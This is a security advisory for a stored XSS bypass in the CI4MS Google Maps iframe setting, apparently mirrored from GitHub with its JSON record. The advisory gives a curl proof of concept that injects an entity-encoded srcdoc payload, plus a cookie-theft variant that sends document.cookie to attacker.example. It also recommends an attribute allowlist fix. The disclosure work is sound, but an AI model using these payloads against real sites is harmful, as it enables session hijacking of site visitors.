GHSA-X3HR-CP7X-44R2

Vulnerability from github – Published: 2026-04-08 19:15 – Updated: 2026-04-08 19:15
VLAI?
Summary
CI4MS has stored XSS via srcdoc attribute bypass in Google Maps iframe setting
Details

Summary

The Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an <iframe> allowlist and regex-based removal of on\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an <iframe srcdoc="..."> payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors.

Details

Input sanitization (modules/Settings/Controllers/Settings.php:49-53):

$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));
$mapValue = preg_replace('/\bon\w+\s*=\s*"[^"]*"/i', '', $mapValue);
$mapValue = preg_replace('/\bon\w+\s*=\s*\'[^\']*\'/i', '', $mapValue);
$mapValue = preg_replace('/\bon\w+\s*=\s*[^\s>]+/i', '', $mapValue);
setting()->set('Gmap.map_iframe', $mapValue);

The three regex patterns only match attributes beginning with on (e.g., onclick, onerror). The srcdoc attribute does not begin with on and passes through untouched.

Output rendering (app/Views/templates/default/gmapiframe.php:3):

<?php echo strip_tags($settings->map_iframe,'<iframe>') ?>

The output applies strip_tags with the same <iframe> allowlist but performs no attribute filtering or HTML encoding. The stored payload is rendered verbatim.

Why HTML entities bypass strip_tags: A payload like <iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"> contains only one tag (<iframe>), which is in the allowlist. The entity-encoded content (&lt;script&gt;) is not recognized as a tag by strip_tags. However, when the browser renders the srcdoc attribute, it decodes the HTML entities and creates a new browsing context containing <script>alert(1)</script>.

Why this is same-origin: Per the HTML specification, an <iframe srcdoc="..."> without a sandbox attribute inherits the parent document's origin. The injected script has full access to the parent page's cookies, DOM, and session.

PoC

Prerequisites: Authenticated admin session with update role on the Settings module.

Step 1: Inject the payload

curl -X POST 'https://target/backend/settings/compInfos' \
  -H 'Cookie: ci_session=ADMIN_SESSION_ID' \
  -d 'cName=TestCo&cAddress=123+Main+St&cPhone=1234567890&cMail=admin@example.com&cMap=%3Ciframe+srcdoc%3D%22%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B%2Fscript%26gt%3B%22%3E%3C%2Fiframe%3E'

The cMap value decodes to:

<iframe srcdoc="&lt;script&gt;alert(document.domain)&lt;/script&gt;"></iframe>

Step 2: Visit any public page that includes the Google Maps widget

Navigate to the frontend contact or footer page as an unauthenticated visitor. The browser renders the srcdoc iframe, decodes the entities, and executes the script in the parent page's origin.

Expected result: JavaScript alert(document.domain) fires showing the target's domain, confirming same-origin execution.

Cookie theft variant:

<iframe srcdoc="&lt;script&gt;document.location='https://attacker.example/steal?c='+document.cookie&lt;/script&gt;"></iframe>

Impact

  • Stored XSS affecting all frontend visitors: The payload persists in the settings database and executes for every unauthenticated visitor viewing pages that include the Google Maps iframe widget.
  • Session hijacking: The script executes in the parent page's origin, giving access to session cookies (unless HttpOnly is set) and the full DOM.
  • Credential theft: An attacker can inject a fake login form or redirect users to a phishing page.
  • Scope change: The attack crosses from the admin backend trust boundary to the public frontend, affecting users who have no relationship with the backend.

The attack requires a compromised or malicious admin account with settings update permission. While this is a privileged starting point (PR:H), the impact crosses to all unauthenticated visitors (S:C), justifying Medium severity.

Recommended Fix

Replace the regex-based attribute blocklist with a strict allowlist approach. Only allow src, width, height, frameborder, style, allowfullscreen, and loading attributes on iframe tags:

// In modules/Settings/Controllers/Settings.php, replace lines 49-52:
$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));
// Strip all attributes except safe ones for iframes
$mapValue = preg_replace_callback(
    '/<iframe\s+([^>]*)>/i',
    function ($matches) {
        $allowedAttrs = ['src', 'width', 'height', 'frameborder', 'style', 'allowfullscreen', 'loading', 'title'];
        preg_match_all('/(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))/i', $matches[1], $attrs, PREG_SET_ORDER);
        $safe = '';
        foreach ($attrs as $attr) {
            $name = strtolower($attr[1]);
            $value = $attr[2] ?: $attr[3] ?: $attr[4];
            if (in_array($name, $allowedAttrs, true)) {
                // For src, only allow https URLs (block javascript: etc.)
                if ($name === 'src' && !preg_match('#^https://#i', $value)) {
                    continue;
                }
                $safe .= ' ' . $name . '="' . esc($value) . '"';
            }
        }
        return '<iframe' . $safe . '>';
    },
    $mapValue
);

This allowlist approach ensures that dangerous attributes like srcdoc, src with javascript: protocol, and any future dangerous attributes are blocked by default.

Severity ?
5.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.31.3.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "ci4-cms-erp/ci4ms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.31.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39390"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T19:15:21Z",
    "nvd_published_at": "2026-04-08T15:16:13Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe Google Maps iframe setting (`cMap` field) in `compInfosPost()` sanitizes input using `strip_tags()` with an `\u003ciframe\u003e` allowlist and regex-based removal of `on\\w+` event handlers. However, the `srcdoc` attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an `\u003ciframe srcdoc=\"...\"\u003e` payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors.\n\n## Details\n\n**Input sanitization** (`modules/Settings/Controllers/Settings.php:49-53`):\n\n```php\n$mapValue = trim(strip_tags($this-\u003erequest-\u003egetPost(\u0027cMap\u0027), \u0027\u003ciframe\u003e\u0027));\n$mapValue = preg_replace(\u0027/\\bon\\w+\\s*=\\s*\"[^\"]*\"/i\u0027, \u0027\u0027, $mapValue);\n$mapValue = preg_replace(\u0027/\\bon\\w+\\s*=\\s*\\\u0027[^\\\u0027]*\\\u0027/i\u0027, \u0027\u0027, $mapValue);\n$mapValue = preg_replace(\u0027/\\bon\\w+\\s*=\\s*[^\\s\u003e]+/i\u0027, \u0027\u0027, $mapValue);\nsetting()-\u003eset(\u0027Gmap.map_iframe\u0027, $mapValue);\n```\n\nThe three regex patterns only match attributes beginning with `on` (e.g., `onclick`, `onerror`). The `srcdoc` attribute does not begin with `on` and passes through untouched.\n\n**Output rendering** (`app/Views/templates/default/gmapiframe.php:3`):\n\n```php\n\u003c?php echo strip_tags($settings-\u003emap_iframe,\u0027\u003ciframe\u003e\u0027) ?\u003e\n```\n\nThe output applies `strip_tags` with the same `\u003ciframe\u003e` allowlist but performs no attribute filtering or HTML encoding. The stored payload is rendered verbatim.\n\n**Why HTML entities bypass `strip_tags`**: A payload like `\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;alert(1)\u0026lt;/script\u0026gt;\"\u003e` contains only one tag (`\u003ciframe\u003e`), which is in the allowlist. The entity-encoded content (`\u0026lt;script\u0026gt;`) is not recognized as a tag by `strip_tags`. However, when the browser renders the `srcdoc` attribute, it decodes the HTML entities and creates a new browsing context containing `\u003cscript\u003ealert(1)\u003c/script\u003e`.\n\n**Why this is same-origin**: Per the HTML specification, an `\u003ciframe srcdoc=\"...\"\u003e` without a `sandbox` attribute inherits the parent document\u0027s origin. The injected script has full access to the parent page\u0027s cookies, DOM, and session.\n\n## PoC\n\n**Prerequisites**: Authenticated admin session with `update` role on the Settings module.\n\n**Step 1: Inject the payload**\n\n```bash\ncurl -X POST \u0027https://target/backend/settings/compInfos\u0027 \\\n  -H \u0027Cookie: ci_session=ADMIN_SESSION_ID\u0027 \\\n  -d \u0027cName=TestCo\u0026cAddress=123+Main+St\u0026cPhone=1234567890\u0026cMail=admin@example.com\u0026cMap=%3Ciframe+srcdoc%3D%22%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B%2Fscript%26gt%3B%22%3E%3C%2Fiframe%3E\u0027\n```\n\nThe `cMap` value decodes to:\n```html\n\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;alert(document.domain)\u0026lt;/script\u0026gt;\"\u003e\u003c/iframe\u003e\n```\n\n**Step 2: Visit any public page that includes the Google Maps widget**\n\nNavigate to the frontend contact or footer page as an unauthenticated visitor. The browser renders the `srcdoc` iframe, decodes the entities, and executes the script in the parent page\u0027s origin.\n\n**Expected result**: JavaScript `alert(document.domain)` fires showing the target\u0027s domain, confirming same-origin execution.\n\n**Cookie theft variant**:\n```\n\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;document.location=\u0027https://attacker.example/steal?c=\u0027+document.cookie\u0026lt;/script\u0026gt;\"\u003e\u003c/iframe\u003e\n```\n\n## Impact\n\n- **Stored XSS affecting all frontend visitors**: The payload persists in the settings database and executes for every unauthenticated visitor viewing pages that include the Google Maps iframe widget.\n- **Session hijacking**: The script executes in the parent page\u0027s origin, giving access to session cookies (unless HttpOnly is set) and the full DOM.\n- **Credential theft**: An attacker can inject a fake login form or redirect users to a phishing page.\n- **Scope change**: The attack crosses from the admin backend trust boundary to the public frontend, affecting users who have no relationship with the backend.\n\nThe attack requires a compromised or malicious admin account with settings update permission. While this is a privileged starting point (PR:H), the impact crosses to all unauthenticated visitors (S:C), justifying Medium severity.\n\n## Recommended Fix\n\nReplace the regex-based attribute blocklist with a strict allowlist approach. Only allow `src`, `width`, `height`, `frameborder`, `style`, `allowfullscreen`, and `loading` attributes on iframe tags:\n\n```php\n// In modules/Settings/Controllers/Settings.php, replace lines 49-52:\n$mapValue = trim(strip_tags($this-\u003erequest-\u003egetPost(\u0027cMap\u0027), \u0027\u003ciframe\u003e\u0027));\n// Strip all attributes except safe ones for iframes\n$mapValue = preg_replace_callback(\n    \u0027/\u003ciframe\\s+([^\u003e]*)\u003e/i\u0027,\n    function ($matches) {\n        $allowedAttrs = [\u0027src\u0027, \u0027width\u0027, \u0027height\u0027, \u0027frameborder\u0027, \u0027style\u0027, \u0027allowfullscreen\u0027, \u0027loading\u0027, \u0027title\u0027];\n        preg_match_all(\u0027/(\\w+)\\s*=\\s*(?:\"([^\"]*)\"|\\\u0027([^\\\u0027]*)\\\u0027|(\\S+))/i\u0027, $matches[1], $attrs, PREG_SET_ORDER);\n        $safe = \u0027\u0027;\n        foreach ($attrs as $attr) {\n            $name = strtolower($attr[1]);\n            $value = $attr[2] ?: $attr[3] ?: $attr[4];\n            if (in_array($name, $allowedAttrs, true)) {\n                // For src, only allow https URLs (block javascript: etc.)\n                if ($name === \u0027src\u0027 \u0026\u0026 !preg_match(\u0027#^https://#i\u0027, $value)) {\n                    continue;\n                }\n                $safe .= \u0027 \u0027 . $name . \u0027=\"\u0027 . esc($value) . \u0027\"\u0027;\n            }\n        }\n        return \u0027\u003ciframe\u0027 . $safe . \u0027\u003e\u0027;\n    },\n    $mapValue\n);\n```\n\nThis allowlist approach ensures that dangerous attributes like `srcdoc`, `src` with `javascript:` protocol, and any future dangerous attributes are blocked by default.",
  "id": "GHSA-x3hr-cp7x-44r2",
  "modified": "2026-04-08T19:15:21Z",
  "published": "2026-04-08T19:15:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39390"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ci4-cms-erp/ci4ms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CI4MS has stored XSS via srcdoc attribute bypass in Google Maps iframe setting"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.